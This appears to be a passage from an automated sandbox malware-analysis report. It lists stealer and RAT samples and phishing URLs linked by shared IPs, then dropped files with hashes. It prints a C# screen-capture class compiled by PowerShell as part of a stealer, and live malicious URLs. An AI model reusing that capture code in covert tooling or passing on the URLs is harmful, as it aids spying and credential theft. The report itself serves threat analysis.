                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      discord.comfile.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                                                                                      • 162.159.138.232
                                                                                                                                                                                                                      B78DGDwttv.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                      • 162.159.135.232
                                                                                                                                                                                                                      YDW0S5K7hi.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                      • 162.159.137.232
                                                                                                                                                                                                                      cDRgXaadjD.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                      • 162.159.128.233
                                                                                                                                                                                                                      dens.exeGet hashmaliciousPython Stealer, Exela Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                                                                      • 162.159.128.233
                                                                                                                                                                                                                      Xyq6rvzLJs.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                      • 162.159.137.232
                                                                                                                                                                                                                      00514DIRyT.exeGet hashmaliciousGO StealerBrowse
                                                                                                                                                                                                                      • 162.159.136.232
                                                                                                                                                                                                                      yuki.exeGet hashmaliciousLuna StealerBrowse
                                                                                                                                                                                                                      • 162.159.138.232
                                                                                                                                                                                                                      CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                                                                                                      • 162.159.135.232
                                                                                                                                                                                                                      CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                                                                                                      • 162.159.137.232
                                                                                                                                                                                                                      bg.microsoft.map.fastly.nethttps://urlsand.esvalabs.com/?u=https%3A%2F%2Fwww.google.es%2Furl%3Fq%3Dquerydvj3%28spellCorrectionEnabled%253Atrue%252CrecentSearchParam%253A%28id%253A3891228890%252CdoLogHistory%253Atrue%29%252Cfilters%253AList%28%28type%253AREGION%252Cvalues%253AList%28%28id%253A103644278%252Ctext%253AUnited%252520States%252CselectionType%253AINCLUDED%29%29%29%29%252Ckeywords%253Aremote%29%26sessionId%3D5NTcRf4wT3OOZdAOuNu6%252FQ%253D%253Dquery%28spellCorrectionEnabled%253Atrue%252CrecentSearchParam%253A%28id%253A3891228890%252CdoLogHistory%253Atrue%29%252Cfilters%253AList%28%28type%253AREGION%252Cvalues%253AList%28%28id%253A103644278%252Ctext%253AUnited%252520States%252CselectionType%253AINCLUDED%29%29%29%29%252Ckeywords%253Aremote%29%26sessionId%3D5NTcRf4wT3OOZdAOuNu6%252FQ%253D%253Dquery%28spellCorrectionEnabled%253Atrue%252CrecentSearchParam%253A%28id%253A3891228890%252CdoLogHistory%253Atrue%29%252Cfilters%253AList%28%28type%253AREGION%252Cvalues%253AList%28%28id%253A103644278%252Ctext%253AUnited%252520States%252CselectionType%253AINCLUDED%29%29%29%29%252Ckeywords%253Aremote%29%26sessionId%3D5NTcRf4wT3OOZdAOuNu6%252FQ%253D%253Dquery%28spellCorrectionEnabled%253Atrue%252CrecentSearchParam%253A%28id%253A3891228890%252CdoLogHistory%253Atrue%29%252Cfilters%253AList%28%28type%253AREGION%252Cvalues%253AList%28%28id%253A103644278%252Ctext%253AUnited%252520States%252CselectionType%253AINCLUDED%29%29%29%29%252Ckeywords%253Aremote%29%26sessionId%3D5NTcRf4wT3OOZdAOuNu6%252FQ%253D%253D%26sa%3Dt%26url%3Damp%252fsafrareal.com.br%252fyoya%252fcwvw6vvf1g5bqgkdfsxdiiczthvxp3de8xxbs%2FcG1lQGZlZGVnYXJpYXNpYS5jb20%3D%24%3F&e=24a2acfd&h=70c4a2f4&f=n&p=yGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                                                                      dekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e pdf .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                      5z3Wzl6uag.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                      https://kunnskapsfilm.noGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                      https://www.google.es/url?q=queryrp18(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fpreview.adope.jp%2fod%2f8gqnmo6zgfuuc6sej4k7rfdswihr8l%2fZnJhbnMuZW5nZWxicmVjaHRAYXJkYWdoZ3JvdXAuY29t$?Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                                                                      https://www.payceconsultings.com/#choonghoon.kim@hyundaielevator.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                      http://tvdseo.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                      https://www.google.ch/url?sa=https://r20.rs6.net/tns.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/afrotech2023.com%2Fdhj%2F4298727249/bmljay5zcHVybG9ja0BsZWcud2EuZ292Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 199.232.210.172
                                                                                                                                                                                                                      https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 199.232.214.172
                                                                                                                                                                                                                      http://www2.megawebfind.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 199.232.214.172

                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      TUT-ASUSakame.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      HBL,MBL CN MBL NO.OOLU274.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      8Hd0ZExgJz.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      (#U0130TOSAM) 11 KASIM 2024 HAFTALIK EKONOM#U0130 B#U00dcLTEN#U0130.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                      CLOUDFLARENETUSEmail_sending_restriction_[sebastien.morel!](#HOHSM).htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.67.151.164
                                                                                                                                                                                                                      ArenaWarsSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                      9RM52QaURq.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                                                                      HZ1BUCfTne.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                                                                      9RM52QaURq.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                                                                      bv2DbIiZeK.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                      • 104.26.13.205
                                                                                                                                                                                                                      brozer.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                      • 104.26.13.205
                                                                                                                                                                                                                      NewVoicemail - +1 392 504 7XXX00-33Rebecca.silvaTranscript.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.16.123.96
                                                                                                                                                                                                                      YU7jHNMJjG.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                      • 172.67.74.152
                                                                                                                                                                                                                      6Ev0Nd7z2t.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                      • 104.26.12.205

                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI74322\VCRUNTIME140.dllmeN9qeS2DE.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                        client1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          qbE2mhhzCq.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                            UwOcZADSmi.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                              IyWKJMlCXg.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                SecuriteInfo.com.Python.Stealer.1545.20368.28754.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                                                                                                                  JdHvcxG4Up.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    souFnS89FP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      Bootstrapper V1.19.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                                                                                                                                                                                        enigma.tech.exeGet hashmaliciousBlank GrabberBrowse

                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:@...e...........................................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\ ?? ?\Display (1).png

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):706852
                                                                                                                                                                                                                                          Entropy (8bit):7.928106029567756
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:ye9t1uq13flvUiKLnInv/kk1hJ2v1JKDQHzfW4pgvW3BMJyAgmNUY6ykz9mCIqVW:TdvUi0nIHWHK0HNYWwgxlyMiqVW
                                                                                                                                                                                                                                          MD5:8C923F1FDA7DDA0541586BA8ED2963A6
                                                                                                                                                                                                                                          SHA1:3DA78AE128FF406F552C1701383FE4B927274F0E
                                                                                                                                                                                                                                          SHA-256:ADA874D777202602B6F554C58C0546E0123745854E0557392693BABB3C3B187A
                                                                                                                                                                                                                                          SHA-512:00142FAC1AF225F2C6888AB2FD5CB3004D4DE62DB0E471D42B88D31558DFFE9D7CFCE93292167B9AC9C44FC09689097265A3E79728EEE72E9C206C22BEAFBF6C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....mWy....{t.p.{=.k..w..v....o..ZNm..r.PD..@.`r...t0..D..M..B.(g!.%....D..c.7....Y..U..N.....s...s..w..o.s.....v...'.....J+....Y?X.....F.+.......3zm...k....{....r_....32....^ug7z.w*...;+s.X....{M.,g..gx.7.(.]w......2....._.z.^x...g.....cl..=..+b...g.9..._#s.......^..ue./.<...s.~..=..1..~[7..[.0..[.2..).W....`.n.3../...nZ.s..q..+b.q.c..>?.M...\.c.....G..50.......l~T....?.S.....}...=....".m~.g+m.cc....a.w,q.)0....x..lz..K....u..\.my....Z..\W.....%.......aK....1w.5....3..r...T./.N..|F.....5..y...U...]=.m.......=N...t.+*.ek..8....jl.iWu[.WrN-..8.\..+......N....pY...z.ro%.X..r........[..<.....K...Me...^Z.../.m!..O...rb.w....../...w.8.....m'.}K?..n=...o...K..c........qe.....c/.....X.U..1..y[N.............g.Z>......cc..-..].<...c`n....e.`...OT6...2&..9.MG]Ti...Y.=.\..Ov.}....U.@l.....q.>l9.....^...vdYsD.;../.....C..6.Z.[.......s.*.y..|.......|

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.0.cs

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1004
                                                                                                                                                                                                                                          Entropy (8bit):4.154581034278981
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                                                                                          MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                                                                                          SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                                                                                          SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                                                                                          SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):607
                                                                                                                                                                                                                                          Entropy (8bit):5.340254418082675
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfghqGWZEifghqb:V3ka6KOkqeFkOfAqXEifAqb
                                                                                                                                                                                                                                          MD5:7CA9DDB3D3C7020F95E262DE8E79785E
                                                                                                                                                                                                                                          SHA1:4B16123C35BE29B7BE9EABC49572467A5798738A
                                                                                                                                                                                                                                          SHA-256:9C9F2DDFECC5EC881DF3D3A43480FC5E37D2645204D171AC360AD1A2FF89FB8F
                                                                                                                                                                                                                                          SHA-512:762E705AA6D675D39C535CA58D3AEC2FC8B676E7896EE7B31D78C2D23240BA16FC4964043A5111B1453E2D10944CF689FCA03EE1306A9E4222550E206817E4A6
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.0.cs"

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.dll

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):4096
                                                                                                                                                                                                                                          Entropy (8bit):3.156700678460479
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:6n7oEAtf0KhzBU/cLf6mtJxN0cKpW1ul8a3Aq:xNz0xm5OV6K
                                                                                                                                                                                                                                          MD5:FF289E468B5FB0D83A09CEFD6EA405AA
                                                                                                                                                                                                                                          SHA1:A172FE689F0B3A742F2AFECDC072A8F7761E2609
                                                                                                                                                                                                                                          SHA-256:4FDF4A82816F4684A976C24ED1689D921449D691433305D55A80A7A10526D4C4
                                                                                                                                                                                                                                          SHA-512:900D395C6B18833C5237A7D0B853943AEEE7EEB891B04CB2AB270E250A18034CB05F0EA25E93109AD7977E253E1F416DFC65C2F26DC10D3F70E4D8FC30277A58
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,7g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.out

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                          Size (bytes):1149
                                                                                                                                                                                                                                          Entropy (8bit):5.505653373118298
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:KJfCDId3ka6KOkqeFkOfAqXEifAqaKax5DqBVKVrdFAMBJTH:uCDkka6NkqeFkyAqXEuAqaK2DcVKdBJj
                                                                                                                                                                                                                                          MD5:A0DBBBDECF659C828F682B5809C3591D
                                                                                                                                                                                                                                          SHA1:95C3E4646BD1647A2146143463C190C4741574D7
                                                                                                                                                                                                                                          SHA-256:2A58FC37B295DC0C72E7C67DA9ABAD9850EDC1C761ED4CD9CA5FF1A0FFB37B54
                                                                                                                                                                                                                                          SHA-512:F4473A7B8391A00AA879AF7C4D359A072FD5FE1CB8E5654246685AF01DA63ABFC4B91386531314AE67470418CD086D8122E0F79E05122633724AE102B6573619
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\0qdpbrpq\CSC1A48FA887436480A8B41407A32798B3.TMP

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                          File Type:MSVC .res
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):652
                                                                                                                                                                                                                                          Entropy (8bit):3.0898577234455193
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryOZ7ak7Ynqq1Z0PN5Dlq5J:+RI+ycuZhNQ7akSj0PNnqX
                                                                                                                                                                                                                                          MD5:7D99A02D00C1AFB7131A07A1D1FE79C7
                                                                                                                                                                                                                                          SHA1:64EB7C6A1194A65C26F30ACF4D2C1338D7C9DFB1
                                                                                                                                                                                                                                          SHA-256:4DAE0A5102300E958EB8755A76322CDFE301596B7161E2E181C24CA64DCC14E2
                                                                                                                                                                                                                                          SHA-512:6A498984E1A836E90CA3528FEBA46FCBB39FC75A902F6D3707EBADA0677CB6F0DC81789E6E55090E0E4D89BF911048D15E8EB54101EF29B044C4B05358F831EB
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.q.d.p.b.r.p.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.q.d.p.b.r.p.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\8KaTn.zip

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe
                                                                                                                                                                                                                                          File Type:RAR archive data, v5
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):758302
                                                                                                                                                                                                                                          Entropy (8bit):7.999764092234822
                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                          SSDEEP:12288:JSAFpA7A/CZpHv1DShasJFhSKwY3nvcO+EQiu5bte71fEHXmduVxxVcUSx:JS+pA7AwpH9DWJFhSgUOnK7XmdkxTsx
                                                                                                                                                                                                                                          MD5:870330AE8987734048A5AADBEB4CDB0C
                                                                                                                                                                                                                                          SHA1:4F951A472D79A50A58F1A706241943EF43364FAE
                                                                                                                                                                                                                                          SHA-256:6B2A572C82C7C8C13B6F2CB8F09CB7E749A7307CCDB3C8638A5261F109441226
                                                                                                                                                                                                                                          SHA-512:0A8A16A99FA5A9AED89D5CCCA523CF72A67281CD65D85312CB6009DFBBC2D2789062F50601F26257FF29E61689F79BC54F7C3620ACFC5CA726C11C088E5EB384
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Preview:Rar!......B.!........../..43`~.r.>..VT..I+.......r....3J....&..e....71.$'4NYvy...`l6c....*(........\..{.w ...<......|...../.Z4.Q^].;v...U.@u?.p...R..X.-.t2.......f*$3S.....:#.$.9.i..R......dF....=(......V....yb.b...0..F,g.-...y.Sa #.R&.].F6.s..}....5.).G....9..W.|.L.D.........7....b..e.&V..wK...x.(.L-d...g.L9M..v...`4M4.bB.....,.....>.!.....E!.#.D..J. [.PC.|.{o|1...{G.y...s..p.I.F....d..x...n.89.p.;...i$%..m}Wy.>...'/F.....K..n.x.0.\D.S...u....z.d.}:.:..,......^.....(=W.So/`.p....|[..g...{A..4.?G.$..!...:8+].....O.U-...B[6B...$\d....Zse....../=.PY..}?.....jw.|.4.n(...I..7Q.G%.x..*..P..a...u.4...S....n..J.]!...5.Z.S..E.lt...sk./:..~....L.c..4<<U.-X...^...=..#.`.|,Y..._ ........u....w]...O.V5..h..cs..lNLG.N.....i.w...T...C.l~^..aW..n...8W3.I1.j.'...6R(}.."...........K.&H.D2..f.\..wUdB../g..MT...V......!W.R....6...`E.F..(........"Y,.:.H.*..-..k.*....t..%.].`.XM..0.......U...x0y.,1=.......c' M.Z.....0~..3:.w.....m!.'..u..[......}qx...[*.ez

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                          Size (bytes):894
